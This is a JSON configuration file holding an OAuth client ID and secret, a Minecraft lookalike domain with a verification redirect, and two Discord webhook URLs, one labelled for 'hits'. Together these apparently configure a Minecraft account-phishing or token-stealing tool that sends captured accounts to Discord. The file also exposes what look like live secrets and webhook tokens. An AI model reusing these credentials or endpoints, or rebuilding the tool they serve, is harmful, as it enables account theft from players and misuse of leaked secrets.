{
  "clientID": "b2932c61-997d-461c-9ac1-34c1d954abcd",
  "clientSecret": "RRb8Q~NFEOcca89mveIRXv7vLajwJT0C7wFUXbDW",
  "domain": "https://api-minecraft.com",
  "redirectURL": "https://api-minecraft.com/verify",
  "webhookURL": "https://discord.com/api/webhooks/1170456960546640054/aQ-Pf4tfEWXyjRX2LQ9W9ivcGv1JwUbdm-rooCH0CGRfkfXuZsNlEqrcL_6x8KRzMUXD",
  "hitWebhookURL": "https://discord.com/api/webhooks/1170458589656264765/ILMtGpp0ZiD-_QZ9iBbBOPqrv6vy3kxS41k661EZ6dTOvvi3ePr-jDoQikEs2pK1E2wG",
  "defaultCode": "de8c139f-6810-4761-b49d-5ef1042a687b",
  "port1": 80,
  "port2": 8000
}
